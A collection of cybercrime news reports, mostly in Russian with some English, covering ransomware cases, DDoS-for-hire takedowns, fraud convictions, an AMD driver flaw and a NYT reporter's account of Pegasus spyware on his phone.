After reverse engineering the driver, the researcher recorded unusual features of its behavior, including the operation of the hashing algorithm, as well as tracking the creation and completion of new processes in the system and monitoring them during the execution of tasks. As it turns out, the driver checks all the names of the running processes on the system and compares them against an internal list of 19 hashed video game names. If there is a match, the driver changes the MSR bit on the system to disable or enable certain hardware optimizations, including disabling or managing the instruction cache.
This behavior can lead to problems with the system under load, but improve the performance of the game. According to the expert, the problem is the "very weak 32-bit hash (CRC or XOR)" used by the driver.
Another issue is the fact that security settings allow any user-mode application to use an unprivileged driver interface. An attacker could thus cause the system to crash using a one-line command in PowerShell.
According to Ionescu, only the B1 versions of the Zen 1 (Ryzen 1xxx) and Zen 2 XT (Ryzen 3xxx) series processors are affected, but the risks could be much greater.
Servers belonging to the Dutch Research Council (NWO) have been compromised, forcing the organization to make its network unavailable and suspend subsidy allocation for the foreseeable future.
The NWO is tasked with investing in research and research infrastructure to increase quality and innovation in science. For this purpose, it is a significant entity in the Netherlands that makes annual investments of close to one billion euros. It funds thousands of researchers at universities and institutes in the country, driving quality and innovation in science.
In a press release on Sunday that conveys a minimum of details about the
attack, the organization says that its servers have been hacked and that its
network is not accessible.
There is no timeframe for restoring the systems but the organization channels
its efforts to solve the issues as fast as possible.
Details about the type of the attack or the malware that the hackers used
remain unavailable at the moment.
With the network down, NWO applications remain unavailable. This includes the organization’s email service (Outlook) and the online resources from the two entities under NWO, the Netherlands Initiative for Education Research (NRO) and the National Governing Body for Practice-oriented Research SIA.
NWO says that its website was not impacted by the attack. The external server hosting the ISAAC application and reporting system used by applicants to submit their proposals also appears to have not been infected.
However, the ISAAC server has been shut down until the incident assessment removes all suspicion of the possibility of malware infection. As a result, the processes of SIA and NRO remain suspended indefinitely.
NWO says that rounds with deadlines coming up soon have been postponed and the evaluation of grant proposals with a passed deadline has been stopped.
The organization also informs that it will provide no more details about the attack and how it occurred while the investigation and system restoration work are underway.
The NWO is the second public body tasked with investing in science and
research that has been hit by a cyberattack in less than a month.
In late January, the UK Research and Innovation (UKRI) agency announced that
it had suffered a ransomware attack that encrypted data and affected two of
its services. Just like NWO, UKRI also handled large funds.
В США были выдвинуты обвинения двум братьям из Судана (Salah Yousif Omer, 22 года, и Alaa Salah Yusuuf Omer, 27 лет) за управление хакерской группировкой Anonymous Sudan, с 2023 года проводившей DDoS-атаки, в том числе на заказ. Ранее, в марте американские правоохранители провели операцию против группировки и, получив судебные ордеры, конфисковали часть использовавшейся ей инфраструктуры: серверы для управления атаками и для передачи команд участвующим в атаках компьютерах, аккаунты GitHub с исходным кодом DDoS- инструментов группировки. Основной инструмент, который группировка и её клиенты использовали для атак, назывался Distributed Cloud Attack Tool (DCAT), также использовались наименования Godzilla, Skynet и InfraShutdown.
«Жертвами атак стали чувствительные правительственные цели и объекты критической инфраструктуры в США и по всему миру, включая Министерство юстиции, Министерство обороны, ФБР, Государственный департамент, медицинский центр Cedars-Sinai в Лос-Анджелесе и правительственные сайты штата Алабама. Жертвами также стали крупные американские технологические платформы, включая Microsoft Corp. и Riot Games Inc. и поставщики сетевых услуг. Атаки привели к перебоям в работе сетей, затронувшим тысячи клиентов.
DDoS-атаки Anonymous Sudan, иногда продолжавшиеся по несколько дней, наносили ущерб веб-сайтам и сетям жертв, часто делая их недоступными или неработоспособными и тем самым нанося значительный ущерб. Например, из-за DDoS-атак Anonymous Sudan было закрыто отделение неотложной помощи в медицинском центре Cedars-Sinai, в результате чего прибывающие пациенты на протяжении примерно 8 часов перенаправлялись в другие медицинские учреждения. Атаки Anonymous Sudan нанесли ущерб американским жертвам более чем на 10 миллионов долларов».
В 2023 году Anonymous Sudan отметилась много где, например, участием в пропалестинских атаках на Израиль и неоднократным нарушением работы ChatGPT.
Среди американских исследований было распространено мнение, что Anonymous Sudan на самом деле связана с Россией. Причиной тому было сотрудничество группировки с пророссийской Killnet с момента своего появления.
Я считал, к Судану группа никакого отношения не имеет, название взяла только для отвода глаз, а политически мотивированными атаками занимается для саморекламы. В феврале этого года Anonymous Sudan уже открыто начала предлагать сервис DDoS-for-hire под брендом InfraShutdown (в марте группировка сообщала о проведении заказной атаки на телеком-оператора Telecom Armenia).
Тем не менее, по мнению американских властей, управляли группировкой всё же суданцы. Как уточняет Washington Post, в марте братья-администраторы были арестованы и до сих пор находятся в руках правоохранительных органов. Но неизвестно, где именно и будут ли они экстрадированы в США.
Наконец, в пресс-релизе Минюста сообщается, что действия против Anonymous Sudan — это часть масштабной операции Operation PowerOFF против сервисов по организации DDoS-атак на заказ. Кроме того, в операции правоохранителям помогли многие частные компании: Akamai SIRT, Amazon Web Services, Cloudflare, Crowdstrike, DigitalOcean, Flashpoint, Google, Microsoft, PayPal, SpyCloud и другие. Согласно Washington Post, найти аккаунты группировки на GitHub смогло неформальное сообщество Big Pipes, выслеживающее сервисы для заказа DDoS-атак.
crowdstrike.com/en-us/blog/anonymous-sudan-hacktivist-group-ddos-indictment
aboutamazon.com/news/aws/amazon-US-department-of-justice-cybersecurity
washingtonpost.com/technology/2024/10/16/sudanese-charged-cyberattack-gang
t.me/netblocks/832
cloudflare.com/learning/ddos/glossary/anonymous-sudan
justice[.]gov/usao-cdca/pr/two-sudanese-nationals-indicted-alleged-role-
anonymous-sudan-cyberattacks-hospitals
justice[.]gov/usao-cdca/media/1373586/dl?inline
justice[.]gov/usao-cdca/media/1373581/dl?inline
AHMED SALAH YOUSIF OMER, WilfordCEO, Zac, Soldi01, ALAA SALAH YUSUUF OMER.
Латгальский окружной суд вынес приговор обвиняемому в вымогательстве 1000 евро 60-летнему Раймонду Скурулсу, которого в научных кругах Латвии считают выдающимся изобретателем.
История получилась такая: в 2018 году изобретатель сообщил Дирекции безопасности дорожного движения (ДБДД) о "дыре" в системе безопасности сайта e-csdd.lv. В ноябре 2018 года дирекция и Государственная полиция выступили с совместным заявлением о том, что ДБДД столкнулись "с несанкционированной попыткой получить доступ к регистру транспортных средств и попыткой вымогательства", но благодаря профессиональным действиям сотрудников дирекции и сотрудничеству с Госполицией удалось задержать предполагаемого преступника.
Полиция действительно задержала Скурулса и даже поместила на несколько дней в изолятор кратковременного содержания, - сообщает Latvijas Avīze.
Оказалось, еще 15 октября 2018 года он звонил в ДБДД, назвав свое имя, и сообщил, что обнаружил возможную уязвимость в системе авторизации, связанную с государственным регистром транспортных средств и водителей. И тогда, и по сей день Скурулс считает, что не должен дарить это открытие ДБДД, поэтому он захотел получить компенсацию за свои услуги.
Поэтому сразу после того, как Скурулс подписал договор с ООО WeAreDots, привлеченным ДБДД в качестве консультанта, он отправил по электронной почте информацию о уязвимости в системе авторизации на сайта e-csdd.lv, которая давала возможность несанкционированного доступа.
Из материалов дела следует, что, даже имея в кармане договор, Скурулс опасался, что его "кинут" и ничего не заплатят за ценную информацию. Его подозрения не только оправдались, но и превзошли все ожидания - в конце октября руководство ДБДД обратилось с заявлением в Госполицию.
Собранные следственным отделом по Басманному району следственного управления по Центральному административному округу Главного следственного управления Следственного комитета Российской Федерации по городу Москве доказательства признаны судом достаточными для вынесения приговора в отношении 27-летнего молодого человека. Он признан виновным в совершении преступлений, предусмотренных ч. 2 ст. 273 УК РФ (создание, использование и распространение вредоносных компьютерных программ), п. «б» ч. 4 ст. 174.1 (легализация (отмывание) денежных средств или иного имущества, приобретенных лицом в результате совершения им преступления в особо крупном размере), ч. 4 ст. 159.6 (мошенничество в сфере компьютерной информации в особо крупном размере).
Следствием и судом установлено, что в период с сентября по декабрь 2020 года фигурант, находясь в Московском регионе, из корыстных побуждений совершил хищение цифровой валюты (криптовалюты) на сумму более 16 млн рублей с электронных кошельков пользователей одного из интернет-ресурсов с помощью установления вредоносного программного обеспечения. После этого для придания правомерного вида владению похищенным имуществом он перевел в денежный эквивалент указанную сумму и приобрел на нее загородный дом.
Следователями столичного СК проведен значительный объем следственных и процессуальных действий, допрошены потерпевшие и специалисты в области компьютерной безопасности, проведены финансово-экономические судебные экспертизы, выводы которых позволили установить причастность фигуранта к указанным преступлениям. Несмотря на сложность расследования уголовного дела, следователям удалось собрать доказательства, изобличающие вину обвиняемого. Ему избрана мера пресечения в виде заключения под стражу.
Приговором Дорогомиловского районного суда города Москвы ему назначено наказание в виде 5 лет 6 месяцев лишения свободы с отбыванием в колонии общего режима.
Суд приговорил владельца интернет-магазина по продаже наркотиков Дмитрия Крикливца к 16 годам колонии строгого режима, сообщила Объединенная пресс- служба судов Краснодарского края.
По ее данным, в конце 2020 года Крикливец зарегистрировал в DarkNet интернет- магазин для реализации наркотических средств и сильнодействующих веществ, а в июне 2021 года незаконно приобрел наркотики массой более 500 граммов для реализации.
«Для увеличения объемов продаж Крикливец решил организовать контрабанду наркотиков: на территорию РФ они должны были поступить из Нидерландов в международном почтовом отправлении. Крикливец был задержан сотрудниками УФСБ России по Краснодарскому краю при получении посылки.
В судебном заседании мужчина вину не признал. Он заявил, что наркотики покупал для собственного употребления, при этом объем был большим, так как оптовая покупка обходится дешевле. А в посылке якобы должны были находиться заказанные ранее наушники», – уточнили в пресс-службе.
Суд признал Крикливца виновным в совершении преступлений, предусмотренных частью 3 статьи 30, частью 5 статьи 228.1, пунктом «б» части 4 статьи 229.1, частью 3 статьи 30, пунктом «г» части 4 статьи 228.1, частью 3 статьи 234 УК РФ.
Сотрудник российской компании, которая предоставляет услуги в области сотовой связи, придумал схему, которая позволила ему обогатиться буквально за два дня. За это время он заработал два миллиона рублей, однако был вычислен правоохранительными структурами.
Идея схемы мошенничества пришла к россиянину через полгода после того, как он начал сотрудничать с неизвестным ему человеком в части пробива данных об абонентах. За свои услуги в этой сфере он получал 200-500 рублей за каждый контакт. Вскоре ему пришла в голову идея оформлять на клиентов оператора сим- карты, о существовании которых жертвы не догадывались.
После этого он вставлял физический пластик в смартфон, активировал сим и подключал опцию использования номера телефона в качестве электронного кошелька. Затем ему удавалось провести через внутренние системы компании фиктивные пополнения балансов этих номеров. В отдельных случаях речь шла о 40 тысячах рублей.
На финальном этапе сотрудник компании выводил средства с сим-карт, как с электронных кошельков. Адресатом переводов поначалу был сам мошенник, однако, поняв, что это выглядит чересчур подозрительно, россиянин подключил к реализации схемы банковские карточки родственников, близких друзей, а также наладил вывод денег на анонимные электронные счета и в букмекерские конторы. Суммарная прибыль составила два миллиона рублей всего за 48 часов работы. Однако такая активность вызвала подозрения у компании. В итоге предприимчивого пробивщика посетили полицейские, против него возбуждено уголовное дело.
Автоматизированные программы, называемые «сэндвич-ботами», заработали миллионы долларов путем обхода прибыльных ордеров на покупку популярных криптоактивов.
Впервые об успешных атаках «сэндвич-ботов» стало широко известно в 2021 году благодаря исследованию компании Eden Network. С помощью специальных ботов злоумышленник отслеживает переводы в пуле неподтвержденных транзакций в каком- либо из интересующих его блокчейнов. Затем, когда бот находит крупный ордер, который неизбежно приведет к изменению цены актива, он заранее выкупает этот актив по более выгодному курсу, «проталкивая» свою транзакцию перед исходной заявкой трейдера за счет повышенной комиссии. После исполнения ордера и изменения цены злоумышленник продает актив с прибылью. Поскольку все процессы автоматизированы и совершаются практически мгновенно, трейдер не успевает прореагировать или вообще не замечает подвоха.
Всплеск интереса неопытных инвесторов к мемтокенам, а также конкуренция за прибыль только облегчают задачу для «сэндвич-ботов». В частности, бот, названный jaredfromsubway.eth, на данный момент заработал около $1,7 млн, в том числе на операциях с мемтокеном PEPE. Совокупно, за последние два месяца этот «сэндвич-бот» потратил около $7 млн в виде комиссий за выполнение более 180 000 транзакций на опережение сделок.
Часть криптосообщества воспринимает атаки со стороны «сэндвич-ботов» как неизбежность. Другая же уверена, что это огромная проблема, которая привлекает очень мало внимания со стороны трейдеров и, вероятно, в долгосрочной перспективе приведет к оттоку пользователей.
«Тактика сэндвич-ботов ничем не отличается от операций с опережением — незаконной практики, при которой трейдеры используют инсайдерскую информацию для обхода крупных ордеров на покупку и получения прибыли. Если бы “сэндвич- атаки” считались кражей, как и другие взломы, то они заняли бы второе место по нанесенному ущербу», – заявил журналистам инвестор, пожелавший сохранить анонимность.
Сегодня Министерство юстиции США объявило об аресте еще 13 доменов, связанных с платформами DDoS-наемников, также известными как "бутеры" или "стресс- сервисы".
Аресты, произведенные на этой неделе, являются частью скоординированных международных усилий правоохранительных органов (известных как операция "PowerOFF") по пресечению деятельности онлайн-платформ, позволяющих любому человеку за определенную сумму денег осуществлять массированные распределенные атаки типа "отказ в обслуживании" (DDoS) против любой цели.
"В рамках продолжающейся инициативы по борьбе с "бутерными" службами компьютерных атак Министерство юстиции сегодня объявило о санкционированном судом аресте 13 интернет-доменов, связанных с этими DDoS-службами", - говорится в сообщении Министерства юстиции.
"Аресты, произведенные на этой неделе, являются третьей волной действий правоохранительных органов США против известных сервисов-буттеров, которые позволяли платным пользователям запускать мощные распределенные атаки типа "отказ в обслуживании", или DDoS, которые наводняли компьютеры целевых пользователей информацией и лишали их возможности доступа в Интернет".
ФБР также нацелилось на ведущие бутер-сервисы в декабре 2022 года, когда оно изъяло еще 48 доменов, при этом десять ранее вышедших из строя платформ зарегистрировали новые домены, что позволило им остаться в сети.
"Десять из 13 доменов, изъятых сегодня, являются реинкарнациями сервисов, которые были изъяты во время предыдущей зачистки в декабре, направленной на 48 сервисов топ-бутеров", - заявили в Минюсте.
"Например, один из доменов, изъятых на этой неделе - cyberstress.org - похоже, является тем же сервисом, который работает под доменом cyberstress.us, изъятым в декабре".
Полный список доменов, изъятых ФБР на этой неделе, и ранее изъятых доменов, связанных с теми же операциями, приведен ниже.
"The FBI tested each of services associated with the SUBJECT DOMAINS, meaning that agents or other personnel visited each of the websites and either used previous login information or registered a new account on the service to conduct attacks," FBI Special Agent Elliott Peterson said.
"I believe that each of the SUBJECT DOMAINS is being used to facilitate the commission of attacks against unwitting victims to prevent the victims from accessing the Internet, to disconnect the victim from or degrade communication with established Internet connections, or to cause other similar damage."
Источник:
https://www.bleepingcomputer[.]com/...ore-domains-linked-to-ddos-for-hire- services/
Айтишник из Москвы перевёл полмиллиона рублей ясновидящей, чтобы вернуть свою девушку. Итог — одиночество и меньше средств на релокацию.
34-летний Пётр зарабатывает кодингом, но его 28-летняя дама Елена решила оставить техномир, стать бьюти-блогером и вообще начать новую жизнь. А потом заявила: Петя, сорян, расставание.
Пётр удара не выдержал и попытался напрогать себе судьбу — нашёл ясновидящую Юлию. Та, конечно же, увидела у несчастного слишком много багов: диагностика стоила 2к, потом потребовалось ещё 40 на первичную работу. В конце концов Юлия выкатила прайс: 444 444 целковых за возвращение любимой. Якобы так сказали духи на кладбище, все деньги она вернёт после ритуала, а на всякий случай отправила скан паспорта. Питон айтишника не задушил, и тот перевёл сумму.
Аутпут ожидаемый: ни ведьмы, ни любимой и чуть меньше средств на переезд в тбилисскую коммуну. Зато полиция уже проверяет мага-мошенницу.
Add:
47-летний геймер выпросил у жены ₽40k, чтобы провернуть сделку в онлайн-игре "Войны престолов". В итоге, мошенники оставили "великого стратега" без денег, а жена пошла писать заявление о разводе в полицию.
По нашим данным, к полицейским обратилась 38-летняя москвичка и поведала душераздирающую историю. По словам женщины, её муж Вадим уже 7 лет играет в онлайн-игру "Войны престолов" и периодически тратит небольшие суммы на развитие своего персонажа.
И вот настал день, когда все его усилия и вложения должны были оправдаться: "великий стратег" решил продать свой раскачанный аккаунт и даже нашёл покупателя, готового перевести ₽70k за логин и пароль. Но путь бутовского воина оказался более тернист и труден, чем казалось изначально.
Коварный Максим, откликнувшийся на объявление Вадима в сообществе игры, перевёл беседу в телегу. Там он сказал, что на его карте стоит странный лимит: мол, он не может переводить суммы, меньше ₽110k. Договорились, что хозяин аккаунта сначала скинет покупателю ₽40k, а тот в ответ вернёт ₽110k.
Вадим убедил свою жену перевести с её карты деньги покупателю, посулив возврат почти в три раза больше. Но как только монетки звякнули, Максим пропал. Вадим остался прокачивать своего воина дальше, а жена пошла в полицию .
Потеряв $208 000 в 2019 году, вуз получил $521 000 в 2022.
В 2019 году Маастрихтский университет подвергся крупной кибератаке с использованием вымогательского ПО. Хакеры зашифровали сотни серверов и систем резервного копирования, лишив 25 000 студентов и сотрудников доступа к научным данным, библиотеке и почте. Киберпреступники потребовали $208 000 в биткоинах. Спустя семь дней после получения требований университет заплатил выкуп, чтобы продолжить работу в штатном режиме.
Нидерландской полиции удалось отследить часть выплаченного выкупа, которая пришла на счет отмывателю денег в Украине . В 2020 году счет этого человека был арестован. На нем хранилось несколько сумм в разных криптовалютах, в том числе и часть выкупа, выплаченного Маастрихтским университетом.
И когда спустя более чем два года криптовалюта вернулась в Нидерланды , ее стоимость выросла с 40 000 евро до 500 000 евро (521 000 долларов).
"Эти деньги пойдут не в общий фонд, а в фонд помощи студентам, испытывающим финансовые трудности", – сказал директор по ИКТ Маастрихтского университета Михиэль Боргерс.
Она осуждена за 7 федеральных преступлений: за одно только электронное мошенничество ей грозит до 20 лет.
Пейдж Томпсон, до 2016 года работавшую инженером в Amazon Web Services , окружной суд США в Сиэтле признал виновной в семи преступлениях. Она обвиняется в электронном мошенничестве, пяти эпизодах несанкционированного доступа к защищенному компьютеру и повреждении защищенного компьютера.
"Госпожа Томпсон использовала свои хакерские навыки для кражи личной информации более 100 миллионов человек и взлома компьютерных серверов для добычи криптовалюты", – сказал прокурор Ник Браун. "Не будучи этичным хакером, который пытается помочь компаниям наладить компьютерную безопасность, она использовала уязвимости в защите для кражи ценных данных и стремилась к собственному обогащению”.
Томпсон была арестована в июле 2019 года, когда компания Capital One сообщила ФБР о взломе. Обвиняемая написала инструмент, который искал некорректно сконфигурированные учетные записи Amazon Web Services. Ей удалось получить данные более 30 клиентов сервиса, среди которых был крупный банк Capital One. Обнаружив жертву, Томпсон приступила к краже личных данных и установке ПО для майнинга криптовалюты. В результате взлома ей удалось получить данные более 100 миллионов американских клиентов Capital One, чем обвиняемая хвасталась в чатах и на интернет-форумах.
Вынесение приговора Томпсон назначено на 15 сентября, за электронное мошенничество ей грозит до 20 лет тюрьмы, а по каждому из других обвинений – до пяти лет.
На этой неделе от BlackCat пострадал университет в Италии. Хакеры требуют выкуп в размере 4,5 миллиона долларов.
BlackCat – первая группировка вымогателей вымогателей, создавшая вредоносное ПО на языке программирования Rust. Они вышли на киберпреступную сцену в 2021 году и стали одной из самых активных банд вымогателей.
На этой неделе BlackCat взяла ответственность за взлом Пизанского университета в Италии. Группировка требует от университета выплатить 4,5 миллиона долларов до 16 июня.
По данным аналитиков ИБ-безопасности компании ANOZR WAY, BlackCat – одна из самых активных вымогательских группировок, ответственная за 12% всех зафиксированных атак. Сейчас ее обгоняют только две банды вымогателей – Lockbit 2.0 и Conti .
В понедельник компания Microsoft опубликовала блог с подробным разбором группировки BlackCat. Компания рассмотрела успешные атаки на устройства с ОС Windows и Linux, а также на экземпляры VMWare. Специалисты Microsoft назвали BlackCat (также известную как ALPHV) ярким примером “хакерской гиг-экономики”, так как она активно предоставляет свое вымогательское ПО как услугу.
Язык программирования Rust помогает группировке избегать обнаружения обычными средствами безопасности и создает проблемы для ИБ-специалистов, мешая перепроектировать полезную нагрузку или сравнить ее с похожим вымогательским ПО.
Обычно хакеры проникают в системы, используя украденные учетные данные жертв и приложения для удаленного доступа к рабочему столу.
Microsoft также заметила DEV-0237 и DEV-0504 – две вымогательские группировки, использующие свежее ПО от BlackCat. По словам представителей компании, изменение полезной нагрузки характерно для группировок, предоставляющих вымогательское ПО как услугу, так как это позволяет получить намного больше денег и сильно затрудняет обнаружение программ-вымогателей.
source: microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat- ransomware
A man charged with conducting ransomware attacks against multiple victims, including the July 2021 attack against Kaseya, made his initial appearance and was arraigned today in the Northern District of Texas.
According to an August 2021 indictment, Yaroslav Vasinskyi, 22, accessed the internal computer networks of several victim companies and deployed Sodinokibi/REvil ransomware to encrypt the data on the computers of victim companies.
“When last year I announced charges against members of the Sodinokibi/REvil ransomware group, I made clear that the Justice Department will spare no resource in identifying and bringing to justice transnational cybercriminals who target the American people,” said Attorney General Merrick B. Garland. “That is exactly what we have done. The United States, alongside our international partners, will continue to swiftly identify, locate, and apprehend alleged cybercriminals, capture their illicit profits, and bring them to justice.”
“Just eight months after committing his alleged ransomware attack on Kaseya from overseas, this defendant has arrived in a Dallas courtroom to face justice,” said Deputy Attorney General Lisa O. Monaco. “When we are attacked, we will work with our partners here and abroad to go after cybercriminals, wherever they may be.”
According to the indictment, Vasinskyi was allegedly responsible for the July 2, 2021, ransomware attack against Kaseya. In the alleged attack against Kaseya, Vasinskyi caused the deployment of malicious Sodinokibi/REvil code throughout a Kaseya product that caused the Kaseya production functionality to deploy REvil ransomware to “endpoints” on Kaseya customer networks. After the remote access to Kaseya endpoints was established, the ransomware was executed on those computers, which resulted in the encryption of data on computers of organizations around the world that used Kaseya software.
Through the deployment of Sodinokibi/REvil ransomware, the defendant allegedly left electronic notes in the form of a text file on the victims’ computers. The notes included a web address leading to an open-source privacy network known as Tor, as well as the link to a publicly accessible website address the victims could visit to recover their files. Upon visiting either website, victims were given a ransom demand and provided a virtual currency address to use to pay the ransom. If a victim paid the ransom, the defendant provided the decryption key and the victim then was able to access their files. If a victim did not pay the ransom, the defendant typically posted the victim’s stolen data or claimed they sold the stolen data to third parties, and victims remained unable to access their files.
Vasinskyi is charged with conspiracy to commit fraud and related activity in connection with computers, damage to protected computers, and conspiracy to commit money laundering. If convicted of all counts, he faces a total penalty of 115 years in prison. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors.
Vasinskyi, a Ukrainian national with ties to a ransomware group linked to Russia-based actors, was taken into custody in Poland where he remained held by authorities pending proceedings in connection with his requested extradition to the United States, pursuant to the extradition treaty between the United States and the Republic of Poland. Vasinskyi was transported to Dallas by U.S. law enforcement authorities where he arrived on March 3. He made his initial court appearance and was arraigned today in the Northern District of Texas.
The FBI’s Dallas and Jackson Field Offices are leading the investigation. Substantial assistance was provided by the Justice Department’s Office of International Affairs and the National Security Division’s Counterintelligence and Export Control Section.
Assistant U.S. Attorney Tiffany H. Eggers for the Northern District of Texas and Senior Counsel Byron M. Jones of the Criminal Division’s Computer Crime and Intellectual Property Section are prosecuting the case.
The U.S. Attorney’s Office for the Northern District of Texas, the FBI’s Dallas and Jackson Field Offices and the Criminal Division’s Computer Crime and Intellectual Property Section conducted the operation in close cooperation with Europol and Eurojust, which were an integral part of coordination. Investigators and prosecutors from several jurisdictions, including Romania's National Police and the Directorate for Investigating Organised Crime and Terrorism; Canada’s Royal Canadian Mounted Police; France’s Court of Paris and BL2C (anti-cybercrime unit police); the Dutch National Police; Poland’s National Prosecutor’s Office, Border Guard, Internal Security Agency, and Ministry of Justice; and the governments of Norway and Australia provided valuable assistance.
The U.S. Department of the Treasury Financial Crimes Enforcement Network (FinCEN), the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA); Germany’s Public Prosecutor’s Office Stuttgart and State Office of Criminal Investigation of Baden-Wuerttemberg; Switzerland’s Public Prosecutor’s Office II of the Canton of Zürich and Cantonal Police Zürich; the National Police of Ukraine and the Prosecutor General’s Office of Ukraine; the United Kingdom’s National Crime Agency; the U.S. Secret Service; the Texas Department of Information Resources; BitDefender; McAfee; and Microsoft also provided significant assistance.
For more resources on ransomware prevention and response, visit www.StopRansomware.gov.
_An indictment is merely an allegation, and all defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.
source : https://www.justice[.]gov/opa/pr/so...-extradited-united-states-and- arraigned-texas_
Программное обеспечение для инвазивного взлома, продаваемое странам для борьбы с терроризмом, легко подвергается злоупотреблениям. Исследователи говорят, что мой телефон дважды взламывали, вероятно, Саудовской Аравией.
Бен Хаббард 24 октября 2021 г., 5:00 по восточному времени.
Times Insider объясняет, кто мы и чем занимаемся, и делится негласным взглядом на то, как объединяется наша журналистика. БЕЙРУТ, Ливан. В Мексике власти взломали мобильные телефоны журналистов и активистов. Саудовская Аравия взламывала телефоны диссидентов дома и за рубежом, отправив некоторых из них в тюрьму. Правитель Дубая взломал телефоны своей бывшей жены и ее адвокатов. Так что, возможно, мне не стоило удивляться, когда я недавно узнал, что меня тоже взломали. Тем не менее, эта новость нервировала. Как корреспондент New York Times, освещающий Ближний Восток, я часто разговариваю с людьми, которые идут на большой риск, делясь информацией, которую их авторитарные правители хотят хранить в секрете. Я принимаю много мер предосторожности, чтобы защитить эти источники, потому что, если бы их поймали, они могли оказаться в тюрьме или умереть. Но в мире, где мы храним так много нашей личной и профессиональной жизни в устройствах, которые носим в наших карманах, и где программное обеспечение для наблюдения продолжает становиться все более сложным, мы все становимся все более уязвимыми. Как оказалось, мне даже не нужно было переходить по ссылке, чтобы мой телефон заразился. Чтобы попытаться определить, что произошло, я работал с Citizen Lab, исследовательским институтом Школы глобальных отношений им. Мунка при Университете Торонто, изучающим шпионское ПО. Я надеялся узнать, когда меня взломали, кем и какая информация была украдена. Но даже с помощью профессиональных интернет-сыщиков ответы были неуловимы. В ходе расследования выяснилось, что я столкнулся с растущей мировой индустрией шпионского ПО, которая продает правительствам инструменты наблюдения, чтобы помочь им бороться с преступностью и отслеживать террористов. Но компании, которые продают эти инструменты, работают в тени, на рынке, который в значительной степени не регулируется, что позволяет государствам использовать технологии по своему усмотрению, в том числе против активистов и журналистов. В 2018 году я стал жертвой подозрительного текстового сообщения, которое, как определила Citizen Lab, вероятно, было отправлено Саудовской Аравией с использованием программного обеспечения под названием Pegasus. Разработчик программного обеспечения, израильская компания NSO Group, отрицает, что его программное обеспечение использовалось.
В этом году сотрудник службы технической безопасности The Times обнаружил еще одну попытку взлома моего телефона в 2018 году. Атака произошла через сообщение WhatsApp на арабском языке, в котором меня пригласили по имени на акцию протеста в посольстве Саудовской Аравии в Вашингтоне. Билл Марчак, старший научный сотрудник Citizen Lab, сказал, что нет никаких признаков того, что какая-либо попытка увенчалась успехом, поскольку я не нажимал на ссылки в этих сообщениях. Но он также обнаружил, что меня дважды взламывали, в 2020 и 2021 годах, с помощью так называемых эксплойтов с нулевым щелчком, которые позволили хакеру проникнуть в мой телефон, не нажимая на какие-либо ссылки. Это как если бы тебя ограбил призрак. Во втором случае, сказал г-н Марчак, оказавшись внутри моего телефона, злоумышленник, по-видимому, удалил следы первого взлома. Представьте себе вора, который врывается в ограбленный ювелирный магазин, чтобы стереть отпечатки пальцев. Эксперты по технической безопасности сказали мне, что установить виновных практически невозможно. Но на основании кода, найденного в моем телефоне, который напоминал то, что он видел в других случаях, г-н Марчак сказал, что у него «большая уверенность» в том, что Pegasus использовался все четыре раза.
По его словам, в ходе двух попыток в 2018 году выяснилось, что Саудовская Аравия начала атаки, потому что они исходили с серверов, управляемых оператором, который ранее атаковал ряд саудовских активистов. Неясно, какая страна была ответственна за взломы в 2020 и 2021 годах, но он отметил, что второй поступил из учетной записи, которая использовалась для взлома саудовского активиста. Я много лет писал о Саудовской Аравии и в прошлом году опубликовал книгу о наследном принце Мохаммеде бен Салмане, фактическом правителе королевства, так что у Саудовской Аравии могут быть причины для того, чтобы заглянуть в мой телефон. NSO отрицает причастность своих продуктов к взломам, написав в электронном письме, что я «не являюсь целью Pegasus ни одним из клиентов NSO», и отклонил выводы г-на Марчака как «спекуляции». Компания заявила, что у нее не было технологии, описанной в попытках 2018 года, и что я не мог быть целью в 2020 или 2021 году из-за «технических и договорных причин и ограничений», которые она не объяснила.
Посольство Саудовской Аравии в Вашингтоне не ответило на запрос о комментарии. NSO отказалось сообщить больше официально, но The Times сообщила, что компания расторгла свои контракты с Саудовской Аравией в 2018 году после того, как саудовские агенты убили писателя-диссидента Джамаля Хашогги, только для того, чтобы возобновить бизнес с королевством в следующем году, добавив договорные ограничения. по использованию программного обеспечения. В этом году NSO снова отключило саудовскую систему после того, как Citizen Lab обнаружила, что правительство использовало Pegasus для взлома телефонов 36 сотрудников арабской спутниковой сети Al Jazeera. По словам Винноны ДеСомбре, сотрудника Атлантического совета, изучающего коммерческое шпионское ПО, сложно назначить ответственность за конкретный взлом, потому что многие компании продают продукты, аналогичные Pegasus, многие страны используют их, а программное обеспечение разработано так, чтобы быть скрытым. Она сравнила процесс анализа ограниченных данных, оставшихся на скомпрометированных устройствах, с «прикосновением слепых к слону». «Нельзя сказать без тени сомнения, - сказала она. Следы, оставленные на моем телефоне, не указали, сколько времени хакеры пробыли внутри и что они взяли, хотя они могли украсть что угодно: фотографии, контакты, пароли и текстовые сообщения. Они также могли бы удаленно включить мой микрофон и камеру, чтобы подслушивать или шпионить за мной. Они украли мои контакты, чтобы арестовать мои источники? Просматривайте мои сообщения, чтобы узнать, с кем я разговаривал? Прокрутите фотографии моей семьи на пляже? Об этом знали только хакеры. Насколько мне известно, ни один из моих источников не пострадал из-за информации, которая могла быть украдена с моего телефона. Но неуверенности было достаточно, чтобы я потерял сон. В прошлом месяце Apple устранила уязвимость, которую хакеры использовали для проникновения в мой телефон в этом году, после того, как получила информацию от Citizen Lab. Но другие уязвимости могут остаться. Пока мы храним наши жизни на устройствах, которые имеют уязвимости, а компании-наблюдатели могут заработать миллионы долларов, продавая способы их использования, наша защита ограничена, особенно если правительство решит, что ему нужны наши данные. Теперь я ограничиваю информацию, которую храню на своем телефоне. Я храню конфиденциальные контакты в автономном режиме. Я призываю людей использовать Signal, приложение для обмена зашифрованными сообщениями, чтобы, если хакер проникнет в него, найти будет нечего. Многие шпионские компании, включая NSO, предотвращают нацеливание на телефонные номера США, предположительно, чтобы избежать драки с Вашингтоном, которая может привести к усилению регулирования, поэтому я использую американский номер телефона. Я часто перезагружаю свой телефон, что может вывести из строя (но не остановить) некоторые шпионские программы. И, когда это возможно, я прибегаю к одному из немногих способов, которые еще не поддаются взлому: я оставляю свой телефон и встречаюсь с людьми лицом к лицу.
Источник: [NYT](https://www.nytimes.com/2021/10/24/insider/hacking-nso- surveillance.html)
